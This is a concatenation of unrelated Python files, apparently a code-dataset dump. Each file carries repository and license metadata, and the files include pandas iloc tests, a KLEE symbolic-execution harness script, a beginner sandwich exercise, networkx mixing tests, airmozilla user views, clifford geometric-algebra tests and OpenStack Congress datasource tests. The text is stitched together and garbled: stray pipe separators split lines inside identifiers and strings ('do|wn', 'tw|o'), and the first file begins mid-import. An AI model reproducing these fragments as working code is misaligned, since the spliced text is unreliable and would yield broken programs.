CategoricalDtype,
DataFrame,
Index,
Interval,
NaT,
Series,
array,
concat,
date_range,
isna,
)
import pandas._testing as tm
from pandas.api.types import is_scalar
from pandas.core.indexing import IndexingError
from pandas.tests.indexing.common import Base
# We pass through the error message from numpy
_slice_iloc_msg = re.escape(
"only integers, slices (`:`), ellipsis (`...`), numpy.newaxis (`None`) "
"and integer or boolean arrays are valid indices"
)
class TestiLoc(Base):
@pytest.mark.parametrize("key", [2, -1, [0, 1, 2]])
def test_iloc_getitem_int_and_list_int(self, key):
self.check_result(
"iloc",
key,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
# array of ints (GH5006), make sure that a single indexer is returning
# the correct type
class TestiLocBaseIndependent:
"""Tests Independent Of Base Class"""
@pytest.mark.parametrize(
"key",
[
slice(None),
slice(3),
range(3),
[0, 1, 2],
Index(range(3)),
np.asarray([0, 1, 2]),
],
)
@pytest.mark.parametrize("indexer", [tm.loc, tm.iloc])
def test_iloc_setitem_fullcol_categorical(self, indexer, key, using_array_manager):
frame = DataFrame({0: range(3)}, dtype=object)
cat = Categorical(["alpha", "beta", "gamma"])
if not using_array_manager:
assert frame._mgr.blocks[0]._can_hold_element(cat)
df = frame.copy()
orig_vals = df.values
indexer(df)[key, 0] = cat
overwrite = isinstance(key, slice) and key == slice(None)
if overwrite or using_array_manager:
# TODO(ArrayManager) we always overwrite because ArrayManager takes
# the "split" path, which still overwrites
# TODO: GH#39986 this probably shouldn't behave differently
expected = DataFrame({0: cat})
assert not np.shares_memory(df.values, orig_vals)
else:
expected = DataFrame({0: cat}).astype(object)
if not using_array_manager:
assert np.shares_memory(df[0].values, orig_vals)
tm.assert_frame_equal(df, expected)
# check we dont have a view on cat (may be undesired GH#39986)
df.iloc[0, 0] = "gamma"
if overwrite:
assert cat[0] != "gamma"
else:
assert cat[0] != "gamma"
# TODO with mixed dataframe ("split" path), we always overwrite the column
frame = DataFrame({0: np.array([0, 1, 2], dtype=object), 1: range(3)})
df = frame.copy()
orig_vals = df.values
indexer(df)[key, 0] = cat
expected = DataFrame({0: cat, 1: range(3)})
tm.assert_frame_equal(df, expected)
# TODO(ArrayManager) does not yet update parent
@td.skip_array_manager_not_yet_implemented
@pytest.mark.parametrize("box", [array, Series])
def test_iloc_setitem_ea_inplace(self, frame_or_series, box, using_array_manager):
# GH#38952 Case with not setting a full column
# IntegerArray without NAs
arr = array([1, 2, 3, 4])
obj = frame_or_series(arr.to_numpy("i8"))
if frame_or_series is Series or not using_array_manager:
values = obj.values
else:
values = obj[0].values
if frame_or_series is Series:
obj.iloc[:2] = box(arr[2:])
else:
obj.iloc[:2, 0] = box(arr[2:])
expected = frame_or_series(np.array([3, 4, 3, 4], dtype="i8"))
tm.assert_equal(obj, expected)
# Check that we are actually in-place
if frame_or_series is Series:
assert obj.values is values
else:
if using_array_manager:
assert obj[0].values is values
else:
assert obj.values.base is values.base and values.base is not None
def test_is_scalar_access(self):
# GH#32085 index with duplicates doesn't matter for _is_scalar_access
index = Index([1, 2, 1])
ser = Series(range(3), index=index)
assert ser.iloc._is_scalar_access((1,))
df = ser.to_frame()
assert df.iloc._is_scalar_access((1, 0))
def test_iloc_exceeds_bounds(self):
# GH6296
# iloc should allow indexers that exceed the bounds
df = DataFrame(np.random.random_sample((20, 5)), columns=list("ABCDE"))
# lists of positions should raise IndexError!
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[:, [0, 1, 2, 3, 4, 5]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, 30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, -30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[100]]
s = df["A"]
with pytest.raises(IndexError, match=msg):
s.iloc[[100]]
with pytest.raises(IndexError, match=msg):
s.iloc[[-100]]
# still raise on a single indexer
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[30]
with pytest.raises(IndexError, match=msg):
df.iloc[-30]
# GH10779
# single positive/negative indexer exceeding Series bounds should raise
# an IndexError
with pytest.raises(IndexError, match=msg):
s.iloc[30]
with pytest.raises(IndexError, match=msg):
s.iloc[-30]
# slices are ok
result = df.iloc[:, 4:10] # 0 < start < len < stop
expected = df.iloc[:, 4:]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -4:-10] # stop < 0 < start < len
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4:-1] # 0 < stop < len < start (down)
expected = df.iloc[:, :4:-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 4:-10:-1] # stop < 0 < start < len (down)
expected = df.iloc[:, 4::-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:4] # start < 0 < stop < len
expected = df.iloc[:, :4]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4] # 0 < stop < len < start
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:-11:-1] # stop < start < 0 < len (do
|
wn)
|
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:11] # 0 < len < start < stop
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
# slice bounds exceeding is ok
result = s.iloc[18:30]
expected = s.iloc[18:]
tm.assert_series_equal(result, expected)
result = s.iloc[30:]
expected = s.iloc[:0]
tm.assert_series_equal(result, expected)
result = s.iloc[30::-1]
expected = s.iloc[::-1]
tm.assert_series_equal(result, expected)
# doc example
def check(result, expected):
str(result)
result.dtypes
tm.assert_frame_equal(result, expected)
dfl = DataFrame(np.random.randn(5, 2), columns=list("AB"))
check(dfl.iloc[:, 2:3], DataFrame(index=dfl.index))
check(dfl.iloc[:, 1:3], dfl.iloc[:, [1]])
check(dfl.iloc[4:6], dfl.iloc[[4]])
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[[4, 5, 6]]
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl
|
ranok/sledgehammer
|
klee-unit/klee-unit.py
|
Python
|
mit
| 4,806
| 0.007491
|
#!/usr/bin/env python
#########################################################################################
# KLEE-Unit
# Author: Jacob Torrey
# Date: 3/15/2016
#
# Script to auto-generate test harness and execute symbolically with KLEE for a passed C
# file
#########################################################################################
import sys
import os
import shutil
import re
import subprocess
from glob import glob
from pycparser import c_parser, c_ast
from ctags import CTags, TagEntry
def collect_klee_runs():
'''Navigates all KLEE output directories and performs basic triage'''
errs = glob('klee-out-*/*.err')
col = {'ptr': 0, 'free': 0, 'div': 0, 'abort': 0, 'assert': 0, 'user': 0, 'model': 0, 'exec': 0}
for e in errs:
e = re.sub(r'\.err', '', e)
e = re.sub(r'^.*test.*[0-9]\.', '', e)
col[e] += 1
print "Found " + str(len(errs)) + " errors in file"
print str(col)
def run_klee(filename, maxs = 180):
'''Runs KLEE on a given file'''
return subprocess.call(['klee', '--libc=uclibc', '--posix-runtime', '-max-time=' + str(maxs), filename])
def generate_c(filename, func):
'''Generates a test harness and temp C file for a passed function'''
# Copy to duplicate safe to trash
newfn = filename[:-2] + "_" + func[0] + '.c'
shutil.copyfile(filename, newfn)
# Rename main() to something not conflicting
f = open(newfn, 'r')
c = f.read()
f.close()
c = re.sub(r' main\s?\(', ' not_main(', c)
c = c + "\r\n\r\n"
# Generate our own main() using symbolic variables for every function argument
main = "int main(int argc, char **argv) {\r\n"
i = 0
fc = func[0] + "("
for f in func[1][1]:
vn = 'var' + str(i)
fc += vn + ", "
vl = f + " " + vn + ";\r\n"
vl += "klee_make_symbolic(&" + vn + ", sizeof(" + f + "), \"" + vn + "\");\r\n"
i += 1
main += vl
fc = fc[:-2] + ");\r\n"
main += fc
main += "return 0;\r\n}\r\n"
c += main
# Inject into temp file
f = open(newfn, 'w')
f.write(c)
f.close()
# Return temp file name
return newfn
def compile_c(filename, outname = 'kleeunit.bc'):
'''Compiles for execution with KLEE'''
ret = subprocess.call(['clang', '-g', '-emit-llvm', '-c', filename, '-o', outname])
#os.remove(filename)
return ret
def run_ctags(filename):
'''Executes the ctags command on the passed filename to generate the tags file'''
return subprocess.call(['ctags', filename])
def parse_pattern(pattern):
'''Parses a ctags pattern string'''
pattern = pattern[2:-2] + ";"
parser = c_parser.CParser()
try:
node = parser.parse(pattern, filename = '<stdin>')
except c_parser.ParseError:
|
print "Unable to parse pattern: " + pattern
sys.exit(-1)
return (node.ext[-1].name, _explain_type(node.ext[-1]))
def _explain_type(decl):
'''Recursively explains a type decl node'''
typ = type(decl)
if typ == c_ast.TypeDecl:
quals = ' '.join(decl.quals) + ' ' if decl.quals else ''
return quals + _explain_type(decl.type)
elif typ == c_ast.Typename or typ == c_ast.Decl:
return _explain_t
|
ype(decl.type)
elif typ == c_ast.IdentifierType:
return ' '.join(decl.names)
elif typ == c_ast.PtrDecl:
quals = ' '.join(decl.quals) + ' ' if decl.quals else ''
return quals + _explain_type(decl.type) + "*"
elif typ == c_ast.ArrayDecl:
arr = 'array'
if decl.dim: arr += '[%s]' % decl.dim.value
return arr + " of " + _explain_type(decl.type)
elif typ == c_ast.FuncDecl:
if decl.args:
params = [_explain_type(param) for param in decl.args.params]
else:
params = []
return [_explain_type(decl.type), params]
def parse_ctags():
'''Returns a list of all the functions and their arguments found by ctags'''
try:
tf = CTags('tags')
except:
print "Unable to find tags file!"
sys.exit(-1)
entry = TagEntry()
l = []
if 0 == tf.first(entry):
return []
while True:
l.append(parse_pattern(entry['pattern']))
if 0 == tf.next(entry):
break
return l
def controller():
'''Main handler that dispatches calls for KLEE-unit'''
if len(sys.argv) != 2:
print "KLEE-Unit: Usage: " + sys.argv[0] + " file_to_analyze.c"
sys.exit(-1)
filename = sys.argv[1]
run_ctags(filename)
funcs = parse_ctags()
for f in funcs:
if f[0] == 'main':
continue
fn = generate_c(filename, f)
compile_c(fn, fn + '.bc')
run_klee(fn + '.bc')
collect_klee_runs()
if __name__ == "__main__":
controller()
|
lluxury/pcc_exercise
|
07/pastrami.py
|
Python
|
mit
| 265
| 0.030189
|
sandwich_orders = ['Bacon
|
','Bacon, egg and cheese','Bagel toast','pastrami','pastrami','pastrami']
print ('pastrami sandwich was sold out')
finished_sandwiches = []
while 'pastrami' in sandwich_orders:
sandwich_orders.remove('pastrami')
print(sandwich_o
|
rders)
|
JMoravec/unkRadnet
|
zunzunCode/pythonequations/Examples/SimpleExamples/NonLinearFit2D.py
|
Python
|
bsd-3-clause
| 1,888
| 0.009534
|
#! /usr/bin/python
# Version info: $Id: NonLinearFit2D.p
|
y 230 2010-06-30 20:20:14Z zunzun.com $
# the pythonequations base is located up one directory from the top-level examples
# directory, go up one directory in the path from there for the import to work properly
import sys, os
if os.path.join(sys.path[0][:sys.p
|
ath[0].rfind(os.sep)], '../..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..'))
import pythonequations
equation = pythonequations.Equations2D.Exponential.Exponential2D() # Simple non-linear function
equation.fittingTarget = 'SSQABS' # see the Equation base class for a list of fitting targets
equation.ConvertTextToData(equation.exampleData) # Equations have ASCII text data for testing and examples
equation.Initialize() # now that the equation has data, set up the cache
# If performing a nonlinear fit and you have parameter estimates, set them
# instead of calling this method. This call is harmless for linear fits
equation.SetGAParametersAndGuessInitialCoefficientsIfNeeded() # estimate initial parameters if needed
equation.FitToCacheData() # perform the fit
equation.CalculateErrors() # so we can print the errors
print equation.name, str(equation.dimensionality) + "D"
print equation.fittingTarget + ":", equation.CalculateFittingTarget(equation.coefficientArray)
for i in range(len(equation.coefficientArray)):
print "Coefficient " + equation.coefficientDesignatorTuple[i] + ": " + str(equation.coefficientArray[i])
print
for i in range(len(equation.DependentDataArray)):
print 'X:', equation.IndependentDataArray[0][i],
print 'Y', equation.DependentDataArray[i],
print 'Model:', equation.PredictedArray[i],
print 'Abs. Error:', equation.AbsoluteErrorArray[i],
print 'Rel. Error:', equation.RelativeErrorArray[i],
print 'Percent Error:', equation.PercentErrorArray[i]
|
ankanch/tieba-zhuaqu
|
user-application/KCrawlerControal/Debug/plugins/trash/singleword.py
|
Python
|
gpl-3.0
| 978
| 0.032663
|
import lib.result_functions_file as RFF
import lib.maglib as MSG
import os
#
|
这个库是统计各个词语的出现次数,并显示
#这是tieba-zhuaqu项目的用户端基本插件
def satisticWord(word,datalist):
os.system('cls')
print('>>>>>开始统计【',word,'】出现次数..
|
..')
sum=1
mlist=[]
for item in datalist:
if item.find(word) != -1:
sum+=1
mlist.append(item)
print('>',end='')
print('>>>>>统计完成!\n\n')
MSG.printline2x35(2)
print('\r\n>>>>>统计结果>----->共【',sum-1,'/',len(datalist),'】条匹配数据,结果如下','\r\n')
MSG.printline2x35(2)
for item in mlist:
print('\t◆\t',item)
MSG.printline2x35(2)
print('\r\n>>>>>统计结果>----->共【',sum-1,'/',len(datalist),'】条匹配数据,结果如下','\r\n')
MSG.printline2x35(2)
return 'SW',sum-1
satisticWord(input("请输入要统计的词语:"),RFF.getContentList())
|
SpaceGroupUCL/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/assortativity/tests/test_mixing.py
|
Python
|
gpl-3.0
| 5,415
| 0.000923
|
import pytest
np = pytest.importorskip("numpy")
npt = pytest.importorskip("numpy.testing")
import networkx as nx
from .base_test import BaseTestAttributeMixing, BaseTestDegreeMixing
class TestDegreeMixingDict(BaseTestDegreeMixing):
def test_degree_mixing_dict_undirected(self):
d = nx.degree_mixing_dict(self.P4)
d_result = {
1: {2: 2},
2: {1: 2, 2: 2},
}
assert d == d_result
def test_degree_mixing_dict_undirected_normalized(self):
d = nx.degree_mixing_dict(self.P4, normalized=True)
d_result = {
1: {2: 1.0 / 3},
2: {1: 1.0 / 3, 2: 1.0 / 3},
}
assert d == d_result
def test_degree_mixing_dict_directed(self):
d = nx.degree_mixing_dict(self.D)
print(d)
d_result = {1: {3: 2}, 2: {1: 1, 3: 1}, 3: {}}
assert d == d_result
def test_degree_mixing_dict_multigraph(self):
d = nx.degree_mixing_dict(self.M)
d_result = {1: {2: 1}, 2: {1: 1, 3: 3}, 3: {2: 3}}
assert d == d_result
class TestDegreeMixingMatrix(BaseTestDegreeMixing):
def test_degree_mixing_matrix_undirected(self):
# fmt: off
a_result = np.array([[0, 0, 0],
[0, 0, 2],
[0, 2, 2]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.P4, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.P4)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_directed(self):
# fmt: off
a_result = np.array([[0, 0, 0, 0],
[0, 0, 0, 2],
[0, 1, 0, 1],
[0, 0, 0, 0]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.D, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.D)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_multigraph(self):
# fmt: off
a_result = np.array([[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 0, 3],
[0, 0, 3, 0]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.M, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.M)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_selfloop(self):
# fmt: off
a_result = np.array([[0, 0, 0],
[0, 0, 0],
[0, 0, 2]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.S, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.S)
npt.assert_equal(a, a_result / float(a_result.sum()))
class TestAttributeMixingDict(BaseTestAttributeMixing):
def test_attribute_mixing_dict_undirected(self):
d = nx.attribute_mixing_dict(self.G, "fish")
d_result = {
"one": {"one": 2, "red": 1},
"two": {"two": 2, "blue": 1},
"red": {"one": 1},
"blue": {"two": 1},
}
assert d == d_result
def test_attribute_mixing_dict_directed(self):
d = nx.attribute_mixing_dict(self.D, "fish")
d_result = {
"one": {"one": 1, "red": 1},
"two": {"two": 1, "blue": 1},
"red": {},
"blue": {},
}
assert d == d_result
def test_attribute_mixing_dict_multigraph(self):
d = nx.attribute_mixing_dict(self.M, "fish")
d_result = {
"one": {"one": 4},
"two": {"two": 2},
}
assert d == d_result
class TestAttributeMixingMatrix(BaseTestAttributeMixing):
def test_attribute_mixing_matrix_undirected(self):
mapping = {"one": 0, "two": 1, "red": 2, "blue": 3}
a_result = np.array([[2, 0, 1, 0], [0, 2, 0, 1], [1, 0, 0, 0], [0, 1, 0, 0]])
a = nx.attribute_mixing_matrix(
self.G, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
a = nx.attribute_mixing_matrix(self.G, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_attribute_mixing_matrix_directed(self):
mapping = {"one": 0, "two": 1, "red": 2, "blue": 3}
a_result = np.array([[1, 0, 1, 0], [0, 1, 0, 1], [0, 0, 0, 0], [0, 0, 0, 0]])
a = nx.attribute_mixing_matrix(
self.D, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
a = nx.attribute_mixing_matrix(self.D, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_attribute_mixing_matrix_multigraph(self):
mapping = {"one": 0, "tw
|
o": 1, "red": 2, "blue": 3}
a_result = np.array([[4, 0, 0, 0], [0, 2, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])
a = nx.attribute_mixing_matrix(
self.M, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
|
a = nx.attribute_mixing_matrix(self.M, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
|
zofuthan/airmozilla
|
airmozilla/manage/views/users.py
|
Python
|
bsd-3-clause
| 3,960
| 0
|
import collections
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.core.cache import cache
from django.contrib import messages
from django.shortcuts import render, redirect
from django.db import transaction
from django.db.models import Q
from funfactory.urlresolvers import reverse
from jsonview.decorators import json_view
from airmozilla.base.utils import dot_dict
from airmozilla.main.models import UserProfile
from airmozilla.manage import forms
from .decorators import (
staff_required,
permission_required,
cancel_redirect
)
@staff_required
@permission_required('auth.change_user')
def users(request):
"""User editor: view users and update a user's group."""
_mozilla_email_filter = (
Q(email__endswith='@%s' % settings.ALLOWED_BID[0])
)
for other in settings.ALLOWED_BID[1:]:
_mozilla_email_filter |= (
Q(email__endswith='@%s' % other)
)
users_stats = {
'total': User.objects.all().count(),
'total_mozilla_email': (
User.objects.filter(_mozilla_email_filter).count()
),
}
context = {
'users_stats': users_stats,
}
return render(request, 'manage/users.html', context)
@staff_required
@permission_required('auth.change_user')
@json_view
def users_data(request):
context = {}
users = cache.get('_get_all_users')
if users is None:
users = _get_all_users()
# this is invalidated in models.py
cache.set('_get_all_users', users, 60 * 60)
context['users'] = users
context['urls'] = {
'manage:user_edit': reverse('manage:user_edit', args=('0',))
}
return context
def _get_all_users():
groups = {}
for group in Group.objects.all().values('id', 'name'):
groups[group['id']] = group['name']
groups_map = collections.defaultdict(list)
for x in User.groups.through.objects.all().values('user_id', 'group_id'):
groups_map[x['user_id']].append(groups[x['group_id']])
users = []
qs = User.objects.all()
values = (
'email',
'id',
'last_login',
'is_staff',
'is_active',
'is_superuser'
)
# make a big fat list of the user IDs of people who are contributors
contributor_ids = (
UserProfile.objects
.filter(contributor=True)
.values_list('user_id', flat=True)
)
for user_dict in qs.values(*values):
user = dot_dict(user_dict)
item = {
'id': user.id,
'email': user.email,
'last_login': user.last_login.isoformat(),
}
# The reason we only add these if they're true is because we want
# to minimize the amount of JSON we return. It works because in
# javascript, doing `if (thing.something)` works equally if it
# exists and is false or if it does not exist.
if user.is_staff:
item['is_staff'] = True
if user.is_superuser:
item['is_superuser'] = True
if user.id in contributor_ids:
item['is_contributor'] = True
if not user.is_active:
item['is_inactive'] = True
if groups_map[user.id]:
item['groups'] = groups_map[user.id]
users.append(item)
return users
@staff_required
@permission_required('auth.change_user')
@cancel_redirect('manage:users')
@transaction.atomic
def user_edit(request, id):
"""Editing an individual user."""
user = User.objects.get(id=id)
if request.method ==
|
'POST':
form = forms.UserEditForm(request.POST, instance=user)
if form.is_valid():
form.save()
messages.info(request, 'User %s saved.' % user.email)
|
return redirect('manage:users')
else:
form = forms.UserEditForm(instance=user)
return render(request, 'manage/user_edit.html',
{'form': form, 'user': user})
|
arsenovic/clifford
|
clifford/test/test_tools.py
|
Python
|
bsd-3-clause
| 8,422
| 0.0019
|
import pytest
import numpy as np
from numpy import testing
from clifford import Cl
from clifford.tools import orthoFrames2Versor as of2v
from clifford._numba_utils import DISABLE_JIT
from clifford import tools
from . import rng # noqa: F401
too_slow_without_jit = pytest.mark.skipif(
DISABLE_JIT, reason="test is too slow without JIT"
)
class TestTools:
def checkit(self, p, q, rng): # noqa: F811
# p, q =4,0
N = p + q
# eps(1e-4)
layout, blades = Cl(p, q)
# create frame
A = layout.randomV(n=N, rng=rng)
# create Rotor
R = 5.*layout.randomRotor(rng=rng)
# create rotated frame
B = [R*a*~R for a in A]
# find versor from both frames
R_found, rs = of2v(A, B)
# Rotor is determiend correctly, within a sign
self.assertTrue(R == R_found or R == -R_found)
# Determined Versor implements desired transformation
self.assertTrue([R_found*a*~R_found for a in A] == B)
@unittest.skip("reason unknown")
def testOrthoFrames2VersorEuclidean(self):
for p, q in [(2, 0), (3, 0), (4, 0)]:
self.checkit(p=p, q=q)
@pytest.mark.skip(reason="unknown") # fails
def testOrthoFrames2VersorMinkowski(self):
for p, q in [(1, 1), (2, 1), (3, 1)]:
self.checkit(p=p, q=q)
@pytest.mark.skip(reason="unknown") # fails
def testOrthoFrames2VersorBalanced(self):
for p, q in [(2, 2)]:
self.checkit(p=p, q=q)
def testframe2Mat(self):
for N in [2, 3, 4]:
l, b = Cl(N)
X = np.random.rand((N**2)).reshape(N, N)
I = l.pseudoScalar
B, I = tools.mat2Frame(X, I=I)
X_, I = tools.frame2Mat(B=B, I=I)
testing.assert_almost_equal(X, X_)
class TestG3Tools:
def test_quaternion_conversions(self, rng): # noqa: F811
"""
Bidirectional rotor - quaternion test. This needs work but is a reasonable start
"""
from clifford.tools.g3 import rotor_to_quaternion, quaternion_to_rotor
from clifford.tools.g3c import random_rotation_rotor
for i in range(1000):
rotor = random_rotation_rotor(rng=rng)
quaternion = rotor_to_quaternion(rotor)
rotor_return = quaternion_to_rotor(quaternion)
testing.assert_almost_equal(rotor.value, rotor_return.value)
@too_slow_without_jit
def test_rotation_matrix_conversions(self, rng): # noqa: F811
"""
Bidirectional rotor - rotation matrix test. This needs work but is a reasonable start
"""
from clifford.g3c import down
from clifford.tools.g3 import rotation_matrix_to_rotor, rotor_to_rotation_matrix
from clifford.tools.g3c import random_rotation_rotor, random_conformal_point, apply_rotor
for i in range(1000):
rotor = random_rotation_rotor(rng=rng)
# Check that we can map up and back
Rmat = rotor_to_rotation_matrix(rotor)
rotor_return = rotation_matrix_to_rotor(Rmat)
# Check that the rotations do the same thing
for k in range(10):
A = random_conformal_point(rng=rng)
B = down(apply_rotor(A, rotor)).value[1:4]
C = Rmat @ down(A).value[1:4]
np.testing.assert_almost_equal(B, C)
C = down(apply_rotor(A, rotor_return)).value[1:4]
np.testing.assert_almost_equal(B, C)
def test_generate_rotation_rotor_and_angle(self, rng): # noqa: F811
"""
Checks rotation rotor generation
"""
from clifford.tools.g3 import generate_rotation_rotor, random_unit_vector, angle_between_vectors
for i in range(1000):
euc_vector_m = random_unit_vector(rng=rng)
euc_vector_n = random_unit_vector(rng=rng)
theta = angle_between_vectors(euc_vector_m, euc_vector_n)
rot_rotor = generate_rotation_rotor(theta, euc_vector_m, euc_vector_n)
v1 = euc_vector_m
v2 = rot_rotor*euc_vector_m*~rot_rotor
theta_return = angle_between_vectors(v1, v2)
testing.assert_almost_equal(theta_return, theta)
testing.assert_almost_equal(euc_vector_n.value, v2.value)
@pytest.mark.skip(reason="unknown")
def test_find_rotor_aligning_vectors(self, rng): # noqa: F811
"""
Currently fails, needs to be dug into
"""
from clifford.g3c import layout
e1 = layout.blades['e1']
e2 = layout.blades['e2']
from clifford.tools.g3 import random_euc_mv, random_rotation_rotor, rotor_align_vecs
u_list = [random_euc_mv(rng=rng) for i in range(50)]
for i in range(100):
r = random_rotation_rotor(rng=rng)
v_list = [r*u*~r for u in u_list]
r_2 = rotor_align_vecs(u_list, v_list)
print(r_2)
print(r)
testing.assert_almost_equal(r.value, r_2.value)
class TestPointProcessing:
def test_convex_hull_vertices(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
conf_vertices = [hull.GApoints[i] for i in hull.vertices]
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(conf_vertices, static=True, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_conformal_rounds(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
rounds = hull.conformal_rounds()
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(rounds, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_conformal_flats(self, rng): # noqa: F811
from clifford.tools.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
flats = hull.conformal_flats()
# from pyganja import GanjaScene, draw
# gs = Ganj
|
aScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# gs.add_objects(flats, color=int('00FF0000', 16))
# draw(gs, scale=0.05)
def test_convex_hull_facets(self, rng): # noqa: F811
from clifford.too
|
ls.g3c import random_conformal_point
from clifford.tools.point_processing import GAConvexHull
point_list = [random_conformal_point(rng=rng) for i in range(100)]
hull = GAConvexHull(point_list, hull_dims=3)
facets = hull.conformal_facets()
# from pyganja import GanjaScene, draw
# gs = GanjaScene()
# gs.add_objects(point_list, static=True, color=int('00000000', 16))
# for f in facets:
# gs.add_facet(f, color=int('AAFF0000', 16))
# draw(gs, scale=0.05)
def test_GADelaunay_facets(self, rng): # noqa: F811
from clifford.g3c import up, blades, layout
e1 = blades['e1']
e2 = blades['e2']
einf = layout.einf
from clifford.tools.g3c import random_conformal_point, project_points_to_plane
from clifford.tools.point_processing import GADelaunay
point_list = [random_conformal_point(rng=rng) for i in range(100)]
point_list_flat = project_points_to_plane(point_list, (up(0)^up(e1)^up(e2)^einf).normal())
hull = GADelaunay(point_list_flat, hull_dims=2)
facets = hull.conformal_facets()
# from pyg
|
ramineni/my_congress
|
congress/tests/dse2/test_datasource.py
|
Python
|
apache-2.0
| 8,631
| 0
|
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import mock
from oslo_config import cfg
from oslo_db import exception as db_exc
from congress.db import datasources as datasource_db
from congress.dse2 import dse_node
from congress import exception as congressException
from congress.tests.api import base as api_base
from congress.tests import base
from congress.tests import fake_datasource
class TestDataSource(base.SqlTestCase):
def setUp(self):
super(TestDataSource, self).setUp()
config = api_base.setup_config(with_fake_datasource=False, api=False,
policy=False)
self.dseNode = config['node']
self.ds_manager = config['ds_manager']
def _get_datasource_request(self):
# leave ID out--generated during creation
return {'name': 'aaron',
'driver': 'fake_datasource',
'description': 'hello world!',
'enabled': True,
'type': None,
'config': {'auth_url': 'foo',
'username': 'armax',
'password': 'password',
'tenant_name': 'armax'}}
def test_add_datasource(self):
req = self._get_datasource_request()
result = self.ds_manager.add_datasource(req)
# test equality of return value except for 'id' field
del(result['id'])
self.assertEqual(req, result)
# check that service actually on dseNode
services = self.dseNode.get_services()
self.assertEqual(len(services), 1)
self.assertEqual(services[0].service_id, req['name'])
self.assertIsInstance(services[0],
fake_datasource.FakeDataSource)
obj = self.dseNode.invoke_service_rpc(
req['name'], 'get_status', {'source_id': None, 'params': None})
self.assertIsNotNone(obj)
@mock.patch.object(datasource_db, 'add_datasource')
def test_add_datasource_db_error(self, add_ds):
add_ds.side_effect = db_exc.DBError('Error in db.')
req = self._get_datasource_request()
self.assertRaises(congressException.DatasourceCreationError,
self.ds_manager.add_datasource, req)
@mock.patch.object(dse_node.DseNode, 'register_service')
def test_add_datasource_synchronizer_error(self, register_ds):
register_ds.side_effect = Exception('Error in registering service')
req = self._get_datasource_request()
self.assertRaises(congressException.DatasourceCreationError,
self.ds_manager.add_datasource, req)
ds = datasource_db.get_datasource_by_name(req['name'])
self.assertIsNone(ds)
def test_get_datasource(self):
req = self._get_datasource_request()
ds = self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasource(ds['id'])
# test equality except for 'id' field
del(result['id'])
self.assertEqual(req, result)
def test_get_datasources(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasources()
self.assertEqual(len(result), 1)
result = result[0]
# test equality except for 'id' field
del(result['id'])
self.assertEqual(req, result)
